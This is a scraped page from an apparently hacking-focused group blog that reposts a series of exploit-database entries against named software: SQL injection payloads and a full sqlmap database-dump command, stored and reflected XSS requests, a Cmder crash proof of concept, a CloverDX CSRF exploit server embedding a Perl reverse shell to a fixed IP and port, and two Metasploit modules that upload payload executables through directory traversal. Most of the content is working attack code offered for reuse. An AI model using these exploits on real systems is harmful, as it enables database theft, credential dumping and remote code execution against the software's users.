source: https://www.securityfocus.com/bid/64572/info
CMS Afroditi is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
CMS Afroditi 1.0 is vulnerable.
http://www.example.com/default.asp?id=25 and 0<=(SELECT count(*) FROM [site]) and 1=1
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863138748
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
# Exploit Title: Cmder Console Emulator 1.3.18 - 'Cmder.exe' Denial of Service (PoC)
# Date: 2021-10-07
# Exploit Author: Aryan Chehreghani
# Vendor Homepage: https://cmder.net
# Software Link: https://github.com/cmderdev/cmder/releases/download/v1.3.18/cmder.zip
# Version: v1.3.18
# Tested on: Windows 10
# [About - Cmder Console Emulator] :
#Cmder is a software package created over absence of usable console emulator on Windows.
#It is based on ConEmu with major config overhaul, comes with a Monokai color scheme, amazing clink (further enhanced by clink-completions) and a custom prompt layout.
# [Security Issue] :
#equires the execution of a .cmd file type and The created file enters the emulator ,That will trigger the buffer overflow condition.
#E.g λ cmder.cmd
# [POC] :
PAYLOAD=chr(235) + "\\CMDER"
PAYLOAD = PAYLOAD * 3000
with open("cmder.cmd", "w") as f:
f.write(PAYLOAD)
# Exploit Title: CMDBuild 3.3.2 - 'Multiple' Cross Site Scripting (XSS)
# Date: 15/11/2021
# Exploit Author: Hosein Vita
# Vendor Homepage: https://www.cmdbuild.org
# Software Link: https://www.cmdbuild.org/en/download/latest-version
# Version: CMDBuild 3.3.2
# Tested on: Linux
Summary:
Multiple stored cross-site scripting (XSS) vulnerabilities in Tecnoteca CMDBuild 3.3.1 allow remote attackers to inject arbitrary web script or HTML via a crafted SVG document. The attack vectors include Add Attachment, Add Office, and Add Employee. Almost all add sections
Proof of concepts :
Stored Xss Example:
1-Login to you'r Dashboard As a low privilege user
2-Click On Basic archives and Employee
3- +Add card Employee
4- Enter your xss payload in parameters
5-On added employee click on "Open Relation Graph"
POST /cmdbuild/services/rest/v3/classes/Employee/cards?_dc=1636978977758 HTTP/1.1
...
Cmdbuild-Actionid: class.card.new.open
Cmdbuild-Requestid: f487ca06-3678-425f-8606-c6b671145353
Cmdbuild-Clientid: WL3L4mteNCU51FxhSQVzno3K
X-Requested-With: XMLHttpRequest
Content-Length: 302
Connection: close
{"_type":"Employee","_tenant":"","Code":"\"><img src=x onerror=alert(1)>","Description":null,"Surname":"\"><img src=x onerror=alert(1)>","Name":"\"><img src=x onerror=alert(1)>","Type":null,"Qualification":null,"Level":null,"Email":null,"Office":null,"Phone":null,"Mobile":null,"Fax":null,"State":null}
------------------------------------------------------------------------
File upload Xss example:
1-Click on Basic archives
2-Click on Workplace - + Add card Workplace
3-Select "attachments" icon - +Add attachment + image
4-Upload your svg file with xss payload
5-Click on preview and Right click open in new tab
Request:
POST /cmdbuild/services/rest/v3/classes/Workplace/cards/271248/attachments HTTP/1.1
Cmdbuild-Actionid: class.card.attachments.open
-----------------------------269319782833689825543405205260
Content-Disposition: form-data; name="file"; filename="kiwi.svg"
Content-Type: image/svg+xml
<?xml version="1.0" encoding="utf-8"?>
<!-- Generator: Adobe Illustrator 16.0.4, SVG Export Plug-In . SVG Version: 6.00 Build 0) -->
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" id="Layer_1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px"
width="612px" height="502.174px" viewBox="0 65.326 612 502.174" enable-background="new 0 65.326 612 502.174"
xml:space="preserve">
<ellipse fill="#C6C6C6" cx="283.5" cy="487.5" rx="259" ry="80"/>
<path id="bird" d="M210.333,65.331C104.367,66.105-12.349,150.637,1.056,276.449c4.303,40.393,18.533,63.704,52.171,79.03
c36.307,16.544,57.022,54.556,50.406,112.954c-9.935,4.88-17.405,11.031-19.132,20.015c7.531-0.17,14.943-0.312,22.59,4.341
c20.333,12.375,31.296,27.363,42.979,51.72c1.714,3.572,8.192,2.849,8.312-3.078c0.17-8.467-1.856-17.454-5.226-26.933
c-2.955-8.313,3.059-7.985,6.917-6.106c6.399,3.115,16.334,9.43,30.39,13.098c5.392,1.407,5.995-3.877,5.224-6.991
c-1.864-7.522-11.009-10.862-24.519-19.229c-4.82-2.984-0.927-9.736,5.168-8.351l20.234,2.415c3.359,0.763,4.555-6.114,0.882-7.875
c-14.198-6.804-28.897-10.098-53.864-7.799c-11.617-29.265-29.811-61.617-15.674-81.681c12.639-17.938,31.216-20.74,39.147,43.489
c-5.002,3.107-11.215,5.031-11.332,13.024c7.201-2.845,11.207-1.399,14.791,0c17.912,6.998,35.462,21.826,52.982,37.309
c3.739,3.303,8.413-1.718,6.991-6.034c-2.138-6.494-8.053-10.659-14.791-20.016c-3.239-4.495,5.03-7.045,10.886-6.876
c13.849,0.396,22.886,8.268,35.177,11.218c4.483,1.076,9.741-1.964,6.917-6.917c-3.472-6.085-13.015-9.124-19.18-13.413
c-4.357-3.029-3.025-7.132,2.697-6.602c3.905,0.361,8.478,2.271,13.908,1.767c9.946-0.925,7.717-7.169-0.883-9.566
c-19.036-5.304-39.891-6.311-61.665-5.225c-43.837-8.358-31.554-84.887,0-90.363c29.571-5.132,62.966-13.339,99.928-32.156
c32.668-5.429,64.835-12.446,92.939-33.85c48.106-14.469,111.903,16.113,204.241,149.695c3.926,5.681,15.819,9.94,9.524-6.351
c-15.893-41.125-68.176-93.328-92.13-132.085c-24.581-39.774-14.34-61.243-39.957-91.247
c-21.326-24.978-47.502-25.803-77.339-17.365c-23.461,6.634-39.234-7.117-52.98-31.273C318.42,87.525,265.838,64.927,210.333,65.331
z M445.731,203.01c6.12,0,11.112,4.919,11.112,11.038c0,6.119-4.994,11.111-11.112,11.111s-11.038-4.994-11.038-11.111
C434.693,207.929,439.613,203.01,445.731,203.01z"/>
<script>alert(1)</script>
</svg>
# Exploit Title: Cmaps v8.0 - SQL injection
- Date: 27.04.2023
- Exploit Author: Lucas Noki (0xPrototype)
- Vendor Homepage: https://github.com/vogtmh
- Software Link: https://github.com/vogtmh/cmaps
- Version: 8.0
- Tested on: Mac, Windows, Linux
- CVE : CVE-2023-29809
*Description:*
The vulnerability found is an SQL injection. The `bookmap` parameter is vulnerable. When visiting the page: http://192.168.0.56/rest/booking/index.php?mode=list&bookmap=test we get the normal JSON response. However if a single quote gets appended to the value of the `bookmap` parameter we get an error message:
```html
<b>Warning</b>: mysqli_num_rows() expects parameter 1 to be mysqli_result, bool given in <b>/var/www/html/rest/booking/index.php</b> on line <b>152</b><br />
```
Now if two single quotes get appended we get the normal response without an error. This confirms the opportunity for sql injection. To really prove the SQL injection we append the following payload:
```
'-(select*from(select+sleep(2)+from+dual)a)--+
```
The page will sleep for two seconds. This confirms the SQL injection.
*Steps to reproduce:*
1. Send the following payload to test the vulnerability: ```'-(select*from(select+sleep(2)+from+dual)a)--+```
2. If the site slept for two seconds run the following sqlmap command to dump the whole database including the ldap credentials.
```shell
python3 sqlmap.py -u "http://<IP>/rest/booking/index.php?mode=list&bookmap=test*" --random-agent --level 5 --risk 3 --batch --timeout=10 --drop-set-cookie -o --dump
```
Special thanks goes out to iCaotix who greatly helped me in getting the environment setup as well as debugging my payload.
## Request to the server:
<img src="Screenshot 2023-04-30 at 22.23.51.png" alt="Screenshot 2023-04-30 at 22.23.51" style="zoom:50%;" />
## Response from the server:
Look at the response time.
<img src="Screenshot 2023-04-30 at 22.24.35.png" alt="Screenshot 2023-04-30 at 22.24.35" style="zoom:50%;" />
source: https://www.securityfocus.com/bid/55395/info
Cm3 CMS is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
http://www.example.com/forums/search.asp?strSearchPhrase="><script>alert(0);</script>&ContainerID=&forumsearchoption=topics
http://www.example.com/search.asp?keywords="><script>alert(0);</script>&SearchType=And&CurrentPage=1
http://www.example.com/search.asp?CurrentPage=1&sitekeywords"><script>alert(0);</script>&SearchType=Default
http://www.example.com/search.asp?SearchType=Keywords&Keywords="><script>alert(0);</script>&x=0&y=0
source: https://www.securityfocus.com/bid/62010/info
cm3 Acora CMS is prone to an information-disclosure vulnerability.
Successful exploits of this issue lead to disclosure of sensitive information which may aid in launching further attacks.
http://www.example.com/AcoraCMS/Admin/top.aspx
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTQ4NjIxMDUxOQ9kFgJmD2QWAgIDD2QWAgIBD2QWCmYPFgIeBFRleHQFJERpZ2l0YWxTZWMgTmV0d29ya3MgV2Vic2l0ZWQCAQ8WAh8ABQpFbnRlcnByaXNlZAICDw8WAh8ABQt2NS40LjUvNGEtY2RkAgMPFgIfAAUgQW5vbnltb3VzIChQdWJsaWMgSW50ZXJuZXQgVXNlcilkAgQPDxYCHgdWaXNpYmxlaGRkZIL9u8OSlqqnBHGwtssOBV5lciAoCg" /></div>
# # # # #
# Exploit Title: CLUB-8 EMS - Event Management System - SQL Injection
# Google Dork: N/A
# Date: 10.02.2017
# Vendor Homepage: http://rexbd.net/
# Software Buy: https://codecanyon.net/item/club8-ems-event-management-system-a-to-z/14067759
# Demo: http://ems.rexbd.net/
# Version: N/A
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# Login as sales man user
# http://localhost/[PATH]/editwatch.php?id=[SQL]
-999'+/*!50000union*/+select+group_concat(username,char(58),password),0x496873616e2053656e63616e,0x7777772e696873616e2e6e6574,4,5,6,7,8,9,10,11,12,13,14+from+users-- -
#
# http://localhost/[PATH]/editwatch.php?id=[SQL]
-999'+/*!50000union*/+select+1,group_concat(username,char(58),password)+from+users-- -
# # # # #
# Exploit Title: CloverDX 5.9.0 - Cross-Site Request Forgery (CSRF) to Remote Code Execution (RCE)
# Date: 14.04.2021
# Exploit Author: niebardzo
# Vendor Homepage: https://www.cloverdx.com/
# Software Link: https://github.com/cloverdx/cloverdx-server-docker
# Version: 5.9.0, 5.8.1, 5.8.0, 5.7.0, 5.6.x, 5.5.x, 5.4.x
# Tested on: Docker image - https://github.com/cloverdx/cloverdx-server-docker
# CVE : CVE-2021-29995
# Replace the target, payload and port to host the exploitation server. Exploit requires, inbound connection to CloverDX
# Victim authenticated to CloverDX and the java to run the ViewStateCracker.java.
# Reference for cracking ViewState:
# https://jazzy.id.au/2010/09/20/cracking_random_number_generators_part_1.html
# https://blog.securityevaluators.com/cracking-javas-rng-for-csrf-ea9cacd231d2
#
import http.server
import socketserver
import requests
from urllib.parse import urlparse
from urllib.parse import parse_qs
from bs4 import BeautifulSoup
import subprocess
import sys
import json
class ExploitHandler(http.server.SimpleHTTPRequestHandler):
def do_GET(self):
self.send_response(200)
self.send_header("Content-Type", "text/html; charset=utf-8")
self.end_headers()
# replace with your own target
target = "http://localhost:8080"
query_comp = parse_qs(urlparse(self.path).query)
if "target" in query_comp:
target = query_comp["target"][0]
req = requests.get(target+"/clover/gui/login.jsf")
if req.status_code != 200:
sys.exit(-1)
# parse the reponse retrieve the ViewState
soup = BeautifulSoup(req.text, "html.parser")
cur_view_state = soup.find("input", {"name": "javax.faces.ViewState"})["value"]
# Use the ViewstateCracker.java to get new Viewstate.
new_view_state = subprocess.check_output(["java", "ViewstateCracker.java", cur_view_state])
new_view_state = new_view_state.decode("utf-8").strip()
print(new_view_state)
if new_view_state == "6927638971750518694:6717304323717288036":
html = ("<!DOCTYPE html><html><head></head><body><h1>Hello Clover Admin!</h1><br>"
+ "<script>window.setTimeout(function () { location.reload()}, 1500)</script></body></html>")
else:
html = ("<!DOCTYPE html><html><head>"
+ "<script>"
+ "function exec1(){document.getElementById('form1').submit(); setTimeout(exec2, 2000);}"
+ "function exec2(){document.getElementById('form2').submit(); setTimeout(exec3, 2000);}"
+ "function exec3(){document.getElementById('form3').submit(); setTimeout(exec4, 2000);}"
+ "function exec4(){document.getElementById('form4').submit();}"
+ "</script>"
+ "</head><body onload='exec1();'><h1>Hello Clover Admin! Please wait here, content is loading...</h1>"
+ "<script>history.pushState('','/');</script>"
+ "<form target='if1' id='form1' method='GET' action='{}/clover/gui/event-listeners' style='visibility: hidden;'>".format(target)
+ "<input type='submit' value='' style='visibility: hidden;'></form> "
+ "<form target='if2' id='form2' enctype='application/x-www-form-urlencoded' method='POST' action='{}/clover/gui/event-listeners' style='visibility: hidden;'>".format(target)
+ "<input type='hidden' value='true' name='javax.faces.partial.ajax'>"
+ "<input type='hidden' value='headerForm:manualListenerItem' name='javax.faces.source'>"
+ "<input type='hidden' value='@all' name='javax.faces.partial.execute'>"
+ "<input type='hidden' value='allContent' name='javax.faces.partial.render'>"
+ "<input type='hidden' value='headerForm:manualListenerItem' name='headerForm:manualListenerItem'>"
+ "<input type='hidden' value='headerForm' name='headerForm'>"
+ "<input type='hidden' value='{}' name='javax.faces.ViewState'>".format(new_view_state.replace(":",":"))
+ "<input type='submit' value='' style='visibility: hidden;'></form> "
+ "<form target='if3' id='form3' enctype='application/x-www-form-urlencoded' method='POST' action='{}/clover/gui/event-listeners' style='visibility: hidden;'>".format(target)
+ "<input type='hidden' value='true' name='javax.faces.partial.ajax'>"
+ "<input type='hidden' value='manualListeneForm:taskType' name='javax.faces.source'>"
+ "<input type='hidden' value='manualListeneForm:taskType' name='javax.faces.partial.execute'>"
+ "<input type='hidden' value='manualListeneForm:taskFormFragment' name='javax.faces.partial.render'>"
+ "<input type='hidden' value='valueChange' name='javax.faces.behavior.event'>"
+ "<input type='hidden' value='change' name='javax.faces.partial.event'>"
+ "<input type='hidden' value='manualListeneForm' name='manualListeneForm'>"
+ "<input type='hidden' value='shell_command' name='manualListeneForm:taskType_input'>"
+ "<input type='hidden' value='on' name='manualListeneForm:saveRunRecord_input'>"
+ "<input type='hidden' value='true' name='manualListeneForm:manualVariablesList_collapsed'>"
+ "<input type='hidden' value='{}' name='javax.faces.ViewState'>".format(new_view_state.replace(":",":"))
+ "<input type='submit' value='' style='visibility: hidden;'></form> "
+ "<form target='if4' id='form4' enctype='application/x-www-form-urlencoded' method='POST' action='{}/clover/gui/event-listeners' style='visibility: hidden;'>".format(target)
+ "<input type='hidden' value='true' name='javax.faces.partial.ajax'>"
+ "<input type='hidden' value='manualListeneForm:execute_button' name='javax.faces.source'>"
+ "<input type='hidden' value='@all' name='javax.faces.partial.execute'>"
+ "<input type='hidden' value='rightContent' name='javax.faces.partial.render'>"
+ "<input type='hidden' value='manualListeneForm:execute_button' name='manualListeneForm:execute_button'>"
+ "<input type='hidden' value='manualListeneForm' name='manualListeneForm'>"
+ "<input type='hidden' value='' name='manualListeneForm:properties:propertiesTable:propName'>"
+ "<input type='hidden' value='' name='manualListeneForm:properties:propertiesTable:propValue'>"
+ "<input type='hidden' value='' name='manualListeneForm:taskType_focus'>"
+ "<input type='hidden' value='shell_command' name='manualListeneForm:taskType_input'>"
#
# Below is the HTML encoded perl reverse, replace with your own payload, remember to HTML encode.
#
+ "<input type='hidden' value='perl -e 'use Socket;$i="192.168.65.2";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'' name='manualListeneForm:shellEditor'>"
+ "<input type='hidden' value='' name='manualListeneForm:workingDirectory'>"
+ "<input type='hidden' value='10000' name='manualListeneForm:timeout'>"
+ "<input type='hidden' value='true' name='manualListeneForm:scriptVariablesList_collapsed'>"
+ "<input type='hidden' value='{}' name='javax.faces.ViewState'>".format(new_view_state.replace(":",":"))
+ "<input type='submit' value='' style='visibility: hidden;'></form> "
+ "<iframe name='if1' style='display: hidden;' width='0' height='0' frameborder='0' ></iframe>"
+ "<iframe name='if2' style='display: hidden;' width='0' height='0' frameborder='0'></iframe>"
+ "<iframe name='if3' style='display: hidden;' width='0' height='0' frameborder='0'></iframe>"
+ "<iframe name='if4' style='display: hidden;' width='0' height='0' frameborder='0'></iframe>"
+ "</body></html>")
self.wfile.write(bytes(html,"utf-8"))
base64_enc_viewstatecracker = "CnB1YmxpYyBjbGFzcyBWaWV3c3RhdGVDcmFja2VyIHsKICAvKiBTVEFSVCBQQVJUIDEgKi8KICBwdWJsaWMgc3RhdGljIGZpbmFsIGludCBvZmZzZXQgICAgID0gMzI7CiAgcHVibGljIHN0YXRpYyBmaW5hbCBpbnQgaXRlcmF0aW9ucyA9IDY1NTM2OwoKICBwdWJsaWMgc3RhdGljIGZpbmFsIFN0cmluZyBnZW5lcmF0ZU5ld1ZpZXdzdGF0ZShmaW5hbCBsb25nIGlkSW5Mb2dpY2FsTWFwLCBmaW5hbCBsb25nIGlkSW5BY3R1YWxNYXApIHsKICAgIGZpbmFsIGxvbmcgZmlyc3QzMkJpdHNPZklkSW5Mb2dpY2FsTWFwICA9IGlkSW5Mb2dpY2FsTWFwID4+PiBvZmZzZXQ7CiAgICBmaW5hbCBsb25nIHNlY29uZDMyQml0c09mSWRJbkxvZ2ljYWxNYXAgPSAoKGlkSW5Mb2dpY2FsTWFwIDw8IG9mZnNldCkgPj4+IG9mZnNldCk7CiAgICBmaW5hbCBsb25nIGZpcnN0MzJCaXRzT2ZJZEluQWN0dWFsTWFwICAgPSBpZEluQWN0dWFsTWFwID4+PiBvZmZzZXQ7ICAgICAgICAgLy8gVmVyaWZpY2F0aW9uCiAgICBmaW5hbCBsb25nIHNlY29uZDMyQml0c09mSWRJbkFjdHVhbE1hcCAgPSAoKGlkSW5BY3R1YWxNYXAgPDwgb2Zmc2V0KSA+Pj4gb2Zmc2V0KTsgLy8gVmVyaWZpY2F0aW9uCiAgICAvKiBFTkQgUEFSVCAxICovCgogICAgLyogU1RBUlQgUEFSVCAyICovCiAgICBsb25nIHRoZV9zZWVkID0gMUw7CgogICAgZm9yIChpbnQgaSA9IDA7IGkgPCBpdGVyYXRpb25zOyBpKyspIHsKICAgICAgbG9uZyB0bXBfc2VlZCA9ICgoZmlyc3QzMkJpdHNPZklkSW5Mb2dpY2FsTWFwIDw8IDE2KSArIGkpOwogICAgICBpZiAoKChpbnQpKCgodG1wX3NlZWQgKiAweDVERUVDRTY2REwgKyAweEJsKSAmICgoMUwgPDwgNDgpIC0gMSkpID4+PiAxNikpID09IHNlY29uZDMyQml0c09mSWRJbkxvZ2ljYWxNYXApIHsKICAgICAgICAvL1N5c3RlbS5vdXQucHJpbnRsbigiU2VlZCBmb3VuZDogIiArIHRtcF9zZWVkKTsKICAgICAgICB0aGVfc2VlZCA9IHRtcF9zZWVkOwogICAgICAgIGJyZWFrOwogICAgICB9CiAgICB9CiAgICAvKiBFTkQgUEFSVCAyICovCgogICAgLyogU1RBUlQgUEFSVCAzICovCiAgICAvLyBHZW5lcmF0ZSBudW1iZXIgMiAoU2Vjb25kIE51bWJlciBvZiBpZEluTG9naWNhbE1hcCkKICAgIHRoZV9zZWVkID0gKHRoZV9zZWVkICogMHg1REVFQ0U2NkRMICsgMHhCTCkgJiAoKDFMIDw8IDQ4KSAtIDEpOwoKICAgIC8vQ2FsY3VsYXRlIHRoZSB2YWx1ZSBvZiBpZEluQWN0dWFsTWFwCiAgICB0aGVfc2VlZCA9ICh0aGVfc2VlZCAqIDB4NURFRUNFNjZETCArIDB4QkwpICYgKCgxTCA8PCA0OCkgLSAxKTsKICAgIHRoZV9zZWVkID0gKHRoZV9zZWVkICogMHg1REVFQ0U2NkRMICsgMHhCTCkgJiAoKDFMIDw8IDQ4KSAtIDEpOwogICAgLyogRU5EIFBBUlQgMyovCgogICAgLyogU1RBUlQgUEFSVCA0Ki8KICAgIC8qIENhbGN1bGF0ZSBhIG5ldyBpZEluTG9naWNhbE1hcCAqLwoKICAgIC8vIEdlbmVyYXRlIHRoZSBmaXJzdCBoYWxmIG9mIHRoZSBmaXJzdCBMb25nCiAgICB0aGVfc2VlZCA9ICh0aGVfc2VlZCAqIDB4NURFRUNFNjZETCArIDB4QkwpICYgKCgxTCA8PCA0OCkgLSAxKTsKICAgIGludCBudW1iZXJfNSA9ICgoaW50KSh0aGVfc2VlZCA+Pj4gMTYpKTsKCiAgICAvLyBHZW5lcmF0ZSB0aGUgc2Vjb25kIGhhbGYgb2YgdGhlIGZpcnN0IExvbmcKICAgIHRoZV9zZWVkID0gKHRoZV9zZWVkICogMHg1REVFQ0U2NkRMICsgMHhCTCkgJiAoKDFMIDw8IDQ4KSAtIDEpOwogICAgaW50IG51bWJlcl82ID0gKChpbnQpKHRoZV9zZWVkID4+PiAxNikpOwoKICAgIC8vSGVyZSBpcyB0aGUgbmV3IGlkSW5Mb2dpY2FsTWFwCiAgICBsb25nIG5ld19sb25nXzEgPSAoKChsb25nKW51bWJlcl81IDw8IDMyKSArIG51bWJlcl82KTsKCgogICAgLyogQ2FsY3VsYXRlIGEgbmV3IGlkSW5BY3R1YWxNYXAgKi8KCiAgICAvLyBHZW5lcmF0ZSB0aGUgZmlyc3QgaGFsZiBvZiB0aGUgc2Vjb25kIExvbmcKICAgIHRoZV9zZWVkID0gKHRoZV9zZWVkICogMHg1REVFQ0U2NkRMICsgMHhCTCkgJiAoKDFMIDw8IDQ4KSAtIDEpOwogICAgaW50IG51bWJlcl83ID0gKChpbnQpKHRoZV9zZWVkID4+PiAxNikpOwoKICAgIC8vIEdlbmVyYXRlIHRoZSBzZWNvbmQgaGFsZiBvZiB0aGUgc2Vjb25kIExvbmcKICAgIHRoZV9zZWVkID0gKHRoZV9zZWVkICogMHg1REVFQ0U2NkRMICsgMHhCTCkgJiAoKDFMIDw8IDQ4KSAtIDEpOwogICAgaW50IG51bWJlcl84ID0gKChpbnQpKHRoZV9zZWVkID4+PiAxNikpOwoKICAgIC8vCiAgICBsb25nIG5ld19sb25nXzIgPSAoKChsb25nKW51bWJlcl83IDw8IDMyKSArIG51bWJlcl84KTsKCiAgICByZXR1cm4gbmV3X2xvbmdfMSArICI6IiArIG5ld19sb25nXzI7CiAgICAvKkVORCBQQVJUNCovCiAgfQogcHVibGljIHN0YXRpYyB2b2lkIG1haW4gKFN0cmluZyBhcmdzW10pIHsKCVN0cmluZyB0b2tlbiA9IGFyZ3NbMF07CglTdHJpbmdbXSBsb25ncyA9IHRva2VuLnNwbGl0KCI6Iik7Cglsb25nIGxvbmcxID0gTG9uZy5wYXJzZUxvbmcobG9uZ3NbMF0pOwoJbG9uZyBsb25nMiA9IExvbmcucGFyc2VMb25nKGxvbmdzWzFdKTsKCVN0cmluZyBuZXdUb2tlbiA9IGdlbmVyYXRlTmV3Vmlld3N0YXRlKGxvbmcxLGxvbmcyKTsKCVN5c3RlbS5vdXQucHJpbnRsbihuZXdUb2tlbik7Cgp9Cgp9Cg=="
#
# This drops ViewstateCracker.java from above, ref: https://blog.securityevaluators.com/cracking-javas-rng-for-csrf-ea9cacd231d2
#
with open("ViewstateCracker.java","w") as f:
f.write(b64decode(bytes(base64_enc_viewstatecracker, 'utf-8')).decode('utf-8'))
exploit_handler = ExploitHandler
PORT = 6010
exploit_server = socketserver.TCPServer(("", PORT), exploit_handler)
exploit_server.serve_forever()
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Rex::Proto::TFTP
include Msf::Exploit::EXE
include Msf::Exploit::WbemExec
def initialize(info={})
super(update_info(info,
'Name' => "Cloudview NMS 2.00b Writable Directory Traversal Execution",
'Description' => %q{
This module exploits a vulnerability found in Cloudview NMS server. The
software contains a directory traversal vulnerability that allows a remote
attacker to write arbitrary file to the file system, which results in
code execution under the context 'SYSTEM'.
},
'License' => MSF_LICENSE,
'Author' => [ 'james fitts' ],
'References' =>
[
['URL', '0day']
],
'Payload' =>
{
'BadChars' => "\x00",
},
'DefaultOptions' =>
{
'ExitFunction' => "none"
},
'Platform' => 'win',
'Targets' =>
[
[ ' Cloudview NMS 2.00b on Windows', {} ]
],
'Privileged' => false,
'DisclosureDate' => "Oct 13 2014",
'DefaultTarget' => 0))
register_options([
OptInt.new('DEPTH', [ false, "Levels to reach base directory", 5 ]),
OptAddress.new('RHOST', [ true, "The remote TFTP server address" ]),
OptPort.new('RPORT', [ true, "The remote TFTP server port", 69 ])
], self.class)
end
def upload(filename, data)
tftp_client = Rex::Proto::TFTP::Client.new(
"LocalHost" => "0.0.0.0",
"LocalPort" => 1025 + rand(0xffff-1025),
"PeerHost" => datastore['RHOST'],
"PeerPort" => datastore['RPORT'],
"LocalFile" => "DATA:#{data}",
"RemoteFile" => filename,
"Mode" => "octet",
"Context" => {'Msf' => self.framework, "MsfExploit" => self },
"Action" => :upload
)
ret = tftp_client.send_write_request { |msg| print_status(msg) }
while not tftp_client.complete
select(nil, nil, nil, 1)
tftp_client.stop
end
end
def exploit
peer = "#{datastore['RHOST']}:#{datastore['RPORT']}"
exe_name = rand_text_alpha(rand(10)+5) + '.exe'
exe = generate_payload_exe
mof_name = rand_text_alpha(rand(10)+5) + '.mof'
mof = generate_mof(mof_name, exe_name)
depth = (datastore['DEPTH'].nil? or datastore['DEPTH'] == 0) ? 10 : datastore['DEPTH']
levels = "../" * depth
print_status("#{peer} - Uploading executable (#{exe.length.to_s} bytes)")
upload("#{levels}WINDOWS\\system32\\#{exe_name}", exe)
select(nil, nil, nil, 1)
print_status("#{peer} - Uploading .mof...")
upload("#{levels}WINDOWS\\system32\\wbem\\mof\\#{mof_name}", mof)
end
end
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
Rank = GreatRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::EXE
include Msf::Exploit::WbemExec
def initialize(info = {})
super(update_info(info,
'Name' => 'Cloudview NMS File Upload',
'Description' => %q{
This module exploits a file upload vulnerability
found within Cloudview NMS < 2.00b. The vulnerability
is triggered by sending specialized packets to the
server with directory traversal sequences (..@ in
this case) to browse outside of the web root.
},
'Author' => [ 'james fitts' ],
'License' => MSF_LICENSE,
'References' =>
[
[ 'URL', '0day' ]
],
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
},
'Privileged' => true,
'Payload' =>
{
'BadChars' => "\x00",
},
'Platform' => 'win',
'Targets' =>
[
[ 'Cloudview NMS 2.00b on Windows', {} ],
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Oct 13 2014'))
register_options([
Opt::RPORT(80),
OptString.new('USERNAME', [ true, "The username to log in with", "Admin" ]),
OptString.new('PASSWORD', [ false, "The password to log in with", "" ])
], self.class )
end
def exploit
# setup
vbs_name = rand_text_alpha(rand(10)+5) + '.vbs'
exe = generate_payload_exe
vbs_content = Msf::Util::EXE.to_exe_vbs(exe)
mof_name = rand_text_alpha(rand(10)+5) + '.vbs'
mof = generate_mof(mof_name, vbs_name)
peer = "#{datastore['RHOST']}:#{datastore['RPORT']}"
print_status("Uploading #{vbs_name} to #{peer}...")
# logging in to get the "session"
@sess = rand(0..2048)
res = send_request_cgi({
'method' => 'POST',
'uri' => "/MPR=#{@sess}:/",
'version' => '1.1',
'ctype' => 'application/x-www-form-urlencoded',
'data' => "username=#{datastore['USERNAME']}&password=#{datastore['PASSWORD']}&mybutton=Login%21&donotusejava=html"
})
# This is needed to setup the upload directory
res = send_request_cgi({
'method' => 'GET',
'uri' => "/MPR=#{@sess}:/descriptor!ChangeDir=C:@..@..@..@WINDOWS@system32@!-!-!@extdir%5Cfilelistpage!-!1000",
'version' => '1.1',
})
# Uploading VBS file
data = Rex::MIME::Message.new
data.add_part("#{vbs_content}", "application/octet-stream", nil, "form-data; name=\"upfile\"; filename=\"#{vbs_name}\"")
post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, "--_Part_")
res = send_request_cgi({
'method' => 'POST',
'uri' => "/MPR=#{@sess}:/",
'version' => '1.1',
'ctype' => "multipart/form-data; boundary=#{data.bound}",
'data' => post_data
})
if res.body =~ /Uploaded file OK/
print_good("Uploaded #{vbs_name} successfully!")
print_status("Uploading #{mof_name} to #{peer}...")
# Setting up upload directory
res = send_request_cgi({
'method' => 'GET',
'uri' => "/MPR=#{@sess}:/descriptor!ChangeDir=C:@..@..@..@WINDOWS@system32@wbem@mof@!-!-!@extdir%5Cfilelistpage!-!1000",
'version' => '1.1'
})
# Uploading MOF file
data = Rex::MIME::Message.new
data.add_part("#{mof}", "application/octet-stream", nil, "form-data; name=\"upfile\"; filename=\"#{mof_name}\"")
post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, "--_Part_")
res = send_request_cgi({
'method' => 'POST',
'uri' => "/MPR=#{@sess}:/",
'version' => '1.1',
'ctype' => "multipart/form-data; boundary=#{data.bound}",
'data' => post_data
})
if res.body =~ /Uploaded file OK/
print_good("Uploaded #{mof_name} successfully!")
else
print_error("Something went wrong...")
end
else
print_error("Something went wrong...")
end
end
end
# Exploit Title: Cloudron 6.2 - 'returnTo ' Cross Site Scripting (Reflected)
# Date: 10.06.2021
# Exploit Author: Akıner Kısa
# Vendor Homepage: https://cloudron.io
# Software Link: https://www.cloudron.io/get.html
# Version: 6.3 >
# CVE : CVE-2021-40868
Proof of Concept:
1. Go to https://localhost/login.html?returnTo=
2. Type your payload after returnTo=
3. Fill in the login information and press the sign in button.
